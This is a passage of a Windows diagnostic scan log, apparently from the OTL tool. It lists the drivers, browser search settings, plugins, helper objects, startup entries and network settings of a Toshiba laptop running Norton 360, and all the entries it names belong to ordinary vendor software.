DRV:64bit: - [2013/03/20 10:51:14 | 000,006,144 | ---- | M] (Motorola Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\motfilt.sys -- (BTCFilterService)

DRV:64bit: - [2013/03/20 10:49:34 | 000,012,288 | ---- | M] (Motorola Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\motusbdevice.sys -- (motusbdevice)

DRV:64bit: - [2013/03/19 18:25:46 | 000,027,648 | ---- | M] (Motorola Mobility Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Motousbnet.sys -- (Motousbnet)

DRV:64bit: - [2013/03/19 18:25:28 | 000,023,552 | ---- | M] (Motorola Mobility Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\motccgp.sys -- (motccgp)

DRV:64bit: - [2012/12/13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)

DRV:64bit: - [2012/08/23 09:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV:64bit: - [2012/08/23 09:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)

DRV:64bit: - [2012/08/21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)

DRV:64bit: - [2012/06/08 17:08:54 | 000,008,832 | ---- | M] (Motorola) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\motswch.sys -- (MotoSwitchService)

DRV:64bit: - [2012/03/24 16:04:12 | 000,020,592 | ---- | M] (Compal Electronics, INC.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CeKbFilter.sys -- (CeKbFilter)

DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)

DRV:64bit: - [2012/02/29 19:02:00 | 000,028,992 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\nvpciflt.sys -- (nvpciflt)

DRV:64bit: - [2011/08/05 14:34:02 | 000,025,496 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)

DRV:64bit: - [2011/08/05 14:34:00 | 000,034,200 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)

DRV:64bit: - [2011/06/27 11:55:50 | 012,231,584 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)

DRV:64bit: - [2011/06/10 06:34:52 | 000,539,240 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)

DRV:64bit: - [2011/05/01 16:33:06 | 008,593,920 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NETwNs64.sys -- (NETwNs64)

DRV:64bit: - [2011/03/23 19:10:28 | 000,036,992 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\thpdrv.sys -- (Thpdrv)

DRV:64bit: - [2011/03/18 17:03:18 | 000,482,384 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tos_sps64.sys -- (tos_sps64)

DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)

DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)

DRV:64bit: - [2011/02/10 16:52:34 | 000,181,760 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc)

DRV:64bit: - [2011/02/10 16:52:34 | 000,082,432 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub)

DRV:64bit: - [2011/02/08 21:07:00 | 000,038,096 | ---- | M] (TOSHIBA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\PGEffect.sys -- (PGEffect)

DRV:64bit: - [2011/02/03 21:59:06 | 001,413,680 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)

DRV:64bit: - [2011/01/31 18:04:42 | 000,174,168 | ---- | M] (JMicron Technology Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\jmcr.sys -- (JMCR)

DRV:64bit: - [2011/01/12 19:51:44 | 000,439,320 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)

DRV:64bit: - [2010/11/20 22:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)

DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)

DRV:64bit: - [2010/10/19 18:34:26 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)

DRV:64bit: - [2010/10/15 18:28:18 | 000,317,440 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)

DRV:64bit: - [2010/03/22 12:55:20 | 000,046,192 | ---- | M] (COMPAL ELECTRONIC INC.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\LPCFilter.sys -- (LPCFilter)

DRV:64bit: - [2009/07/30 22:22:04 | 000,027,784 | ---- | M] (TOSHIBA Corporation.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tdcmdpst.sys -- (tdcmdpst)

DRV:64bit: - [2009/07/14 17:31:18 | 000,026,840 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\TVALZ_O.SYS -- (TVALZ)

DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)

DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)

DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)

DRV:64bit: - [2009/06/29 18:16:20 | 000,014,784 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\Thpevm.sys -- (Thpevm)

DRV:64bit: - [2009/06/19 21:15:22 | 000,014,472 | ---- | M] (TOSHIBA Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TVALZFL.sys -- (TVALZFL)

DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)

DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)

DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)

DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)

DRV:64bit: - [2007/08/13 20:48:52 | 000,011,576 | ---- | M] (Samsung Electronics) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\SSPORT.SYS -- (SSPORT)

DRV:64bit: - [2007/08/12 21:48:48 | 000,054,072 | ---- | M] (Samsung Electronics) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\DGIVECP.SYS -- (DgiVecp)

DRV - [2014/10/17 15:59:52 | 000,633,560 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSviA64.sys -- (IDSVia64)

DRV - [2014/10/03 14:19:31 | 001,587,416 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys -- (BHDrvx64)

DRV - [2014/08/26 22:08:33 | 000,487,216 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys -- (eeCtrl)

DRV - [2014/08/26 22:08:32 | 000,142,640 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)

DRV - [2014/08/11 03:41:57 | 002,137,304 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.016\ex64.sys -- (NAVEX15)

DRV - [2014/08/11 03:41:55 | 000,129,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.016\eng64.sys -- (NAVENG)

DRV - [2012/12/18 15:30:40 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Motive\MREMP50.sys -- (MREMP50)

DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)

DRV - [2007/08/12 21:48:57 | 000,041,984 | ---- | M] (Samsung Electronics Co., Ltd.) [Kernel | Auto | Stopped] -- C:\Windows\SysWOW64\drivers\DGIVECP.SYS -- (DgiVecp)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {2D1389C8-B7A4-42B3-9385-7287A26C0DF5}

IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE:64bit: - HKLM\..\SearchScopes\{2C284C26-5B06-4DFC-B46C-9D2EA294202A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF

IE:64bit: - HKLM\..\SearchScopes\{2D1389C8-B7A4-42B3-9385-7287A26C0DF5}: "URL" = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

IE:64bit: - HKLM\..\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}: "URL" = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm

IE - HKLM\..\SearchScopes,DefaultScope = {2D1389C8-B7A4-42B3-9385-7287A26C0DF5}

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKLM\..\SearchScopes\{2C284C26-5B06-4DFC-B46C-9D2EA294202A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF

IE - HKLM\..\SearchScopes\{2D1389C8-B7A4-42B3-9385-7287A26C0DF5}: "URL" = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

IE - HKLM\..\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}: "URL" = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl

IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\SearchScopes,DefaultScope = {2D1389C8-B7A4-42B3-9385-7287A26C0DF5}

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\SearchScopes\{2C284C26-5B06-4DFC-B46C-9D2EA294202A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR&pc=HPNTDF

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\SearchScopes\{2D1389C8-B7A4-42B3-9385-7287A26C0DF5}: "URL" = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}: "URL" = http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\SearchScopes\{C6375EBC-5C3D-4491-AADA-B48CB13B0238}: "URL" = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>;192.168.*.*

========== FireFox ==========

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()

FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found

FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll File not found

FF - HKLM\Software\MozillaPlugins\@nosltd.com/getPlus+®,version=1.6.2.102: C:\Program Files (x86)\NOS\bin\np_gp.dll File not found

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn\ [2014/10/28 21:07:56 | 000,000,000 | ---D | M]

O1 HOSTS File: ([2014/10/29 07:24:12 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts

O1 - Hosts: 127.0.0.1 localhost

O2:64bit: - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\CoIEPlg.dll (Symantec Corporation)

O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

O2:64bit: - BHO: (TOSHIBA Media Controller Plug-in) - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)

O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\CoIEPlg.dll (Symantec Corporation)

O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\ipsbho.dll (Symantec Corporation)

O2 - BHO: (TOSHIBA Media Controller Plug-in) - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)

O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

O3:64bit: - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\CoIEPlg.dll (Symantec Corporation)

O3 - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\CoIEPlg.dll (Symantec Corporation)

O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.

O3:64bit: - HKU\S-1-5-21-616022151-183045692-1389677156-1014\..\Toolbar\WebBrowser: (Google Toolbar) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)

O4:64bit: - HKLM..\Run: [HSON] C:\Program Files\TOSHIBA\TBS\HSON.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [igfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)

O4:64bit: - HKLM..\Run: [intelPAN] C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe (Intel® Corporation)

O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)

O4:64bit: - HKLM..\Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor)

O4:64bit: - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)

O4:64bit: - HKLM..\Run: [TCrdMain] C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [Teco] C:\Program Files\TOSHIBA\TECO\Teco.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [ThpSrv] C:\windows\SysNative\thpsrv.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [TosNC] C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [TosReelTimeMonitor] C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [TosSENotify] C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [TosVolRegulator] C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [TosWaitSrv] C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe (TOSHIBA Corporation)

O4:64bit: - HKLM..\Run: [TPwrMain] C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe (TOSHIBA Corporation)

O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)

O4 - HKLM..\Run: [HWSetup] C:\Program Files\TOSHIBA\Utilities\HWSetup.exe (TOSHIBA Electronics, Inc.)

O4 - HKLM..\Run: [KeNotify] C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe (TOSHIBA CORPORATION)

O4 - HKLM..\Run: [samsung PanelMgr] C:\windows\Samsung\PanelMgr\ssmmgr.exe ()

O4 - HKLM..\Run: [sVPWUTIL] C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe (TOSHIBA CORPORATION)

O4 - HKLM..\Run: [ToshibaAppPlace] C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe (Toshiba)

O4 - HKLM..\Run: [ToshibaServiceStation] C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe (TOSHIBA Corporation)

O4 - HKU\S-1-5-21-616022151-183045692-1389677156-1011..\Run: [sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)

O4 - HKU\S-1-5-21-616022151-183045692-1389677156-1011..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-616022151-183045692-1389677156-1011\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-616022151-183045692-1389677156-1014\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)

O13 - gopher Prefix: missing

O16 - DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab (Microsoft Office Template and Media Control)

O16 - DPF: {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab (Reg Error: Key error.)

O16 - DPF: {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.hp.com/ChatEntry/downloads/sysinfo.cab (Reg Error: Key error.)

O16 - DPF: {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab (Reg Error: Key error.)

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_25-windows-i586.cab (Java Plug-in 1.6.0_25)

O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab (Java Plug-in 1.6.0_07)

O16 - DPF: {CAFEEFAC-0016-0000-0025-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_25-windows-i586.cab (Java Plug-in 1.6.0_25)

O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab (Reg Error: Key error.)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_25-windows-i586.cab (Java Plug-in 1.6.0_25)

O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/bingame/popcaploader_v10.cab (Reg Error: Key error.)

O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3DA0890A-2924-4051-9A03-16DBB86235F1}: DhcpNameServer = 192.168.1.254

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{55D00CA8-6D7D-457C-9ED6-0958BAE81E77}: DhcpNameServer = 192.168.1.1

O18:64bit: - Protocol\Handler\livecall - No CLSID value found

O18:64bit: - Protocol\Handler\ms-help - No CLSID value found

O18:64bit: - Protocol\Handler\msnim - No CLSID value found

O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found

O18:64bit: - Protocol\Handler\wlpg - No CLSID value found

O20:64bit: - AppInit_DLLs: (C:\Windows\System32\nvinitx.dll) - C:\Windows\SysNative\nvinitx.dll (NVIDIA Corporation)

O20 - AppInit_DLLs: (C:\Windows\SysWOW64\nvinit.dll) - C:\Windows\SysWOW64\nvinit.dll (NVIDIA Corporation)

O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation)

